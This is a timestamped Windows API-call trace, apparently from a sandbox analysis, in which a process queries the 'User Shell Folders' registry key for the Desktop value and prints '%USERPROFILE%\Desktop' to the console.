0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0179.904] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0179.904] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0179.905] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0179.905] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0179.905] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0179.905] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0179.905] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0179.905] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0179.905] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0179.905] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0179.905] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0179.905] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0179.905] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0179.905] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0179.905] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0179.905] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0179.905] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0179.905] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0179.905] StrChrIW (lpStart="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", wMatch=0x5c) returned="\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" [0179.906] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0179.906] GetProcessHeap () returned 0x21404080000 [0179.906] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x28) returned 0x21404088f20 [0179.906] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 2 [0179.906] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0179.906] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0179.906] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0179.906] StrChrIW (lpStart="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" [0179.906] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0179.906] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" [0179.906] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0179.906] StrChrIW (lpStart="Windows\\CurrentVersion\\Explorer\\User Shell Folders", wMatch=0x5c) returned="\\CurrentVersion\\Explorer\\User Shell Folders" [0179.906] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0179.906] StrChrIW (lpStart="CurrentVersion\\Explorer\\User Shell Folders", wMatch=0x5c) returned="\\Explorer\\User Shell Folders" [0179.906] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0179.906] StrChrIW (lpStart="Explorer\\User Shell Folders", wMatch=0x5c) returned="\\User Shell Folders" [0179.906] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0179.906] StrChrIW (lpStart="User Shell Folders", wMatch=0x5c) returned 0x0 [0179.906] RtlRestoreLastWin32Error () returned 0x7b545bc000 [0179.906] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0179.906] RtlRestoreLastWin32Error () returned 0x7b545bc000 [0179.906] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0179.906] GetProcessHeap () returned 0x21404080000 [0179.906] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x8c) returned 0x21404085420 [0179.907] GetProcessHeap () returned 0x21404080000 [0179.907] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0xb8) returned 0x21404080720 [0179.907] GetProcessHeap () returned 0x21404080000 [0179.907] GetProcessHeap () returned 0x21404080000 [0179.907] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404088f20) returned 1 [0179.907] GetProcessHeap () returned 0x21404080000 [0179.907] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404088f20) returned 0x28 [0179.907] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404088f20) returned 1 [0179.907] GetProcessHeap () returned 0x21404080000 [0179.907] GetProcessHeap () returned 0x21404080000 [0179.907] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404084a60) returned 1 [0179.907] GetProcessHeap () returned 0x21404080000 [0179.907] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404084a60) returned 0x96 [0179.908] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404084a60) returned 1 [0179.908] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 3 [0179.908] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="-f", cchCount2=-1) returned 1 [0179.908] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/k", cchCount2=-1) returned 3 [0179.908] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="-k", cchCount2=-1) returned 1 [0179.908] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0179.908] lstrlenW (lpString="Desktop") returned 7 [0179.908] GetProcessHeap () returned 0x21404080000 [0179.908] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x10) returned 0x21404084990 [0179.908] lstrlenW (lpString="Desktop") returned 7 [0179.908] lstrlenW (lpString="Desktop") returned 7 [0179.908] GetProcessHeap () returned 0x21404080000 [0179.908] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404088ec0 [0179.908] GetProcessHeap () returned 0x21404080000 [0179.908] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404089160 [0179.908] GetProcessHeap () returned 0x21404080000 [0179.908] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404089130 [0179.908] GetProcessHeap () returned 0x21404080000 [0179.908] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404088ef0 [0179.908] GetProcessHeap () returned 0x21404080000 [0179.908] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x18) returned 0x214040807e0 [0179.908] _memicmp (_Buf1=0x214040807e0, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0179.908] GetProcessHeap () returned 0x21404080000 [0179.908] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x22) returned 0x21404088f20 [0179.908] GetProcessHeap () returned 0x21404080000 [0179.908] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404084990) returned 1 [0179.909] GetProcessHeap () returned 0x21404080000 [0179.909] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404084990) returned 0x10 [0179.909] RtlRestoreLastWin32Error () returned 0x7b545bc000 [0179.909] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20019, phkResult=0x7b542ff9b0 | out: phkResult=0x7b542ff9b0*=0x80) returned 0x0 [0179.909] __iob_func () returned 0x7ffbed90e210 [0179.909] _fileno (_File=0x7ffbed90e240) returned 1 [0179.980] _errno () returned 0x21404300840 [0179.980] _get_osfhandle (_FileHandle=1) returned 0x84 [0179.980] _errno () returned 0x21404300840 [0179.980] GetFileType (hFile=0x84) returned 0x3 [0179.980] lstrlenW (lpString="\n") returned 1 [0179.983] GetConsoleOutputCP () returned 0x1b5 [0179.997] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0179.997] GetConsoleOutputCP () returned 0x1b5 [0180.019] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0180.019] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 1 [0180.020] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0180.020] lstrlenW (lpString="Desktop") returned 7 [0180.020] lstrlenW (lpString="*?") returned 2 [0180.020] lstrlenW (lpString="Desktop") returned 7 [0180.020] lstrlenW (lpString="Desktop") returned 7 [0180.020] lstrlenW (lpString="Desktop") returned 7 [0180.020] StrChrIW (lpStart="Desktop", wMatch=0x2a) returned 0x0 [0180.020] RtlRestoreLastWin32Error () returned 0x7b545bc000 [0180.020] lstrlenW (lpString="Desktop") returned 7 [0180.020] StrChrIW (lpStart="Desktop", wMatch=0x3f) returned 0x0 [0180.021] RtlRestoreLastWin32Error () returned 0x7b545bc000 [0180.021] RtlRestoreLastWin32Error () returned 0x7b545bc000 [0180.021] RegGetValueW (in: hkey=0x80, lpSubKey=0x0, lpValue="Desktop", dwFlags=0xffff, pdwType=0x0, pvData=0x0, pcbData=0x7b542ff980*=0x0 | out: pdwType=0x0, pvData=0x0, pcbData=0x7b542ff980*=0x3c) returned 0x0 [0180.021] GetProcessHeap () returned 0x21404080000 [0180.021] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x3e) returned 0x214040854c0 [0180.021] GetProcessHeap () returned 0x21404080000 [0180.021] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x214040854c0) returned 1 [0180.021] GetProcessHeap () returned 0x21404080000 [0180.021] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x214040854c0) returned 0x3e [0180.021] RegGetValueW (in: hkey=0x80, lpSubKey=0x0, lpValue="Desktop", dwFlags=0x1000ffff, pdwType=0x7b542ff900, pvData=0x214040854c0, pcbData=0x7b542ff980*=0x3c | out: pdwType=0x7b542ff900*=0x2, pvData="%USERPROFILE%\\Desktop", pcbData=0x7b542ff980*=0x2c) returned 0x0 [0180.021] __iob_func () returned 0x7ffbed90e210 [0180.021] GetProcessHeap () returned 0x21404080000 [0180.021] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x18) returned 0x21404080800 [0180.021] _memicmp (_Buf1=0x21404080800, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0180.021] GetProcessHeap () returned 0x21404080000 [0180.021] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x1000) returned 0x21404089d00 [0180.021] _vsnwprintf (in: _Buffer=0x21404089d00, _BufferCount=0x7ff, _Format="%s\n", _ArgList=0x7b542ff8e0 | out: _Buffer="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n") returned 88 [0180.021] _fileno (_File=0x7ffbed90e240) returned 1 [0180.022] _errno () returned 0x21404300840 [0180.022] _get_osfhandle (_FileHandle=1) returned 0x84 [0180.022] _errno () returned 0x21404300840 [0180.022] GetFileType (hFile=0x84) returned 0x3 [0180.022] lstrlenW (lpString="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n") returned 88 [0180.022] GetConsoleOutputCP () returned 0x1b5 [0180.023] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n", cchWideChar=88, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 88 [0180.023] GetConsoleOutputCP () returned 0x1b5 [0180.023] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n", cchWideChar=88, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n", lpUsedDefaultChar=0x0) returned 88 [0180.023] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 88 [0180.023] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0180.024] __iob_func () returned 0x7ffbed90e210 [0180.024] _memicmp (_Buf1=0x21404080800, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0180.024] _vsnwprintf (in: _Buffer=0x21404089d00, _BufferCount=0x7ff, _Format="%*s", _ArgList=0x7b542ff890 | out: _Buffer=" ") returned 4 [0180.024] _fileno (_File=0x7ffbed90e240) returned 1 [0180.024] _errno () returned 0x21404300840 [0180.024] _get_osfhandle (_FileHandle=1) returned 0x84 [0180.024] _errno () returned 0x21404300840 [0180.024] GetFileType (hFile=0x84) returned 0x3 [0180.024] lstrlenW (lpString=" ") returned 4 [0180.024] GetConsoleOutputCP () returned 0x1b5 [0180.026] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0180.026] GetConsoleOutputCP () returned 0x1b5 [0180.027] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 4 [0180.027] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 4 [0180.027] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0180.027] lstrlenW (lpString="Desktop") returned 7 [0180.027] __iob_func () returned 0x7ffbed90e210 [0180.027] _fileno (_File=0x7ffbed90e240) returned 1 [0180.027] _errno () returned 0x21404300840 [0180.027] _get_osfhandle (_FileHandle=1) returned 0x84 [0180.027] _errno () returned 0x21404300840 [0180.027] GetFileType (hFile=0x84) returned 0x3 [0180.027] lstrlenW (lpString="Desktop") returned 7 [0180.027] GetConsoleOutputCP () returned 0x1b5 [0180.028] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Desktop", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0180.028] GetConsoleOutputCP () returned 0x1b5 [0180.028] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Desktop", cchWideChar=7, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desktop", lpUsedDefaultChar=0x0) returned 7 [0180.028] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 7 [0180.028] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0180.028] __iob_func () returned 0x7ffbed90e210 [0180.028] _fileno (_File=0x7ffbed90e240) returned 1 [0180.028] _errno () returned 0x21404300840 [0180.028] _get_osfhandle (_FileHandle=1) returned 0x84 [0180.028] _errno () returned 0x21404300840 [0180.029] GetFileType (hFile=0x84) returned 0x3 [0180.029] lstrlenW (lpString=" ") returned 4 [0180.029] GetConsoleOutputCP () returned 0x1b5 [0180.029] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0180.029] GetConsoleOutputCP () returned 0x1b5 [0180.030] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 4 [0180.030] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 4 [0180.030] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0180.030] __iob_func () returned 0x7ffbed90e210 [0180.030] _fileno (_File=0x7ffbed90e240) returned 1 [0180.030] _errno () returned 0x21404300840 [0180.030] _get_osfhandle (_FileHandle=1) returned 0x84 [0180.030] _errno () returned 0x21404300840 [0180.030] GetFileType (hFile=0x84) returned 0x3 [0180.030] lstrlenW (lpString="REG_EXPAND_SZ") returned 13 [0180.030] GetConsoleOutputCP () returned 0x1b5 [0180.031] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="REG_EXPAND_SZ", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.031] GetConsoleOutputCP () returned 0x1b5 [0180.031] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="REG_EXPAND_SZ", cchWideChar=13, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REG_EXPAND_SZ", lpUsedDefaultChar=0x0) returned 13 [0180.031] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 13 [0180.031] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0180.031] __iob_func () returned 0x7ffbed90e210 [0180.031] _fileno (_File=0x7ffbed90e240) returned 1 [0180.031] _errno () returned 0x21404300840 [0180.032] _get_osfhandle (_FileHandle=1) returned 0x84 [0180.032] _errno () returned 0x21404300840 [0180.032] GetFileType (hFile=0x84) returned 0x3 [0180.032] lstrlenW (lpString=" ") returned 4 [0180.032] GetConsoleOutputCP () returned 0x1b5 [0180.032] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0180.032] GetConsoleOutputCP () returned 0x1b5 [0180.033] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=4, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 4 [0180.033] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 4 [0180.033] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0180.033] __iob_func () returned 0x7ffbed90e210 [0180.033] _fileno (_File=0x7ffbed90e240) returned 1 [0180.033] _errno () returned 0x21404300840 [0180.033] _get_osfhandle (_FileHandle=1) returned 0x84 [0180.033] _errno () returned 0x21404300840 [0180.033] GetFileType (hFile=0x84) returned 0x3 [0180.033] lstrlenW (lpString="%USERPROFILE%\\Desktop") returned 21 [0180.033] GetConsoleOutputCP () returned 0x1b5 [0180.034] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="%USERPROFILE%\\Desktop", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.034] GetConsoleOutputCP () returned 0x1b5 [0180.035] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="%USERPROFILE%\\Desktop", cchWideChar=21, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="%USERPROFILE%\\Desktop", lpUsedDefaultChar=0x0) returned 21 [0180.035] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 21 [0180.035] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0180.035] __iob_func () returned 0x7ffbed90e210 [0180.035] _fileno (_File=0x7ffbed90e240) returned 1 [0180.035] _errno () returned 0x21404300840 [0180.035] _get_osfhandle (_FileHandle=1) returned 0x84 [0180.035] _errno () returned 0x21404300840 [0180.035] GetFileType (hFile=0x84) returned 0x3 [0180.035] lstrlenW (lpString="\n") returned 1 [0180.035] GetConsoleOutputCP () returned 0x1b5 [0180.036] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0180.036] GetConsoleOutputCP () returned 0x1b5 [0180.036] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0180.036] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 1 [0180.036] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0180.036] GetProcessHeap () returned 0x21404080000 [0180.036] GetProcessHeap () returned 0x21404080000 [0180.037] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x214040854c0) returned 1 [0180.037] GetProcessHeap () returned 0x21404080000 [0180.037] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x214040854c0) returned 0x3e [0180.037] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x214040854c0) returned 1 [0180.037] __iob_func () returned 0x7ffbed90e210 [0180.037] _fileno (_File=0x7ffbed90e240) returned 1 [0180.037] _errno () returned 0x21404300840 [0180.037] _get_osfhandle (_FileHandle=1) returned 0x84 [0180.037] _errno () returned 0x21404300840 [0180.037] GetFileType (hFile=0x84) returned 0x3 [0180.037] lstrlenW (lpString="\n") returned 1 [0180.037] GetConsoleOutputCP () returned 0x1b5 [0180.038] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0180.038] GetConsoleOutputCP () returned 0x1b5 [0180.038] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0180.038] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 1 [0180.039] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0180.039] RegCloseKey 